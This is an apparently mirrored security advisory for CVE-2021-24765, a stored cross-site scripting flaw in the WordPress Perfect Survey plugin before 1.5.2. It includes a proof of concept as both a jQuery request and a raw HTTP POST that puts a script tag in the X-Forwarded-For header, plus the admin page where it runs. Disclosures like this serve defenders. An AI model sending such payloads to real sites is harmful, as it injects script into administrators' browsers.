Lucene search
Apple502jWPEX-ID:4440E7CA-1A55-444D-8F6C-04153302D750HistoryOct 05, 2021 - 12:00 a.m.
Perfect Survey < 1.5.2 - Unauthenticated Stored Cross-Site Scripting
2021-10-0500:00:00
apple502j
31
- cross-site scripting
- unauthenticated
- perfect survey
EPSS
0.001
Percentile
41.8%
The plugin does not validate and escape the X-Forwarded-For header value before outputting it in the statistic page when the Anonymize IP setting of a survey is turned off, leading to a Stored Cross-Site Scripting issue
jQuery.post({data:{
ps_questions:{1:["1"]},
action:"save_question_data",
ID:"765",
},url:"https://example.com/wp-admin/admin-ajax.php",headers:{"X-Forwarded-For":"<script>alert(/XSS/)</script>"}})
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Forwarded-For: <script>alert(/XSS/)</script>
X-Requested-With: XMLHttpRequest
Content-Length: 60
Connection: close
ps_questions%5B1%5D%5B%5D=1&action=save_question_data&ID=765
Then go to https://example.com/wp-admin/edit.php?post_type=ps&page=single_statistic&id=765Related
wpvulndb
wpvulndb
Perfect Survey < 1.5.2 - Unauthenticated Stored Cross-Site Scripting
2021-10-05 00:00:00
prion
prion
Cross site scripting
2022-02-01 13:15:00
cvelist
cvelist
cnvd
cnvd
WordPress Perfect Survey plugin cross-site scripting vulnerability
2022-02-10 00:00:00
patchstack
patchstack
nvd
nvd
CVE-2021-24765
2022-02-01 13:15:08
cve
cve
CVE-2021-24765
2022-02-01 13:15:08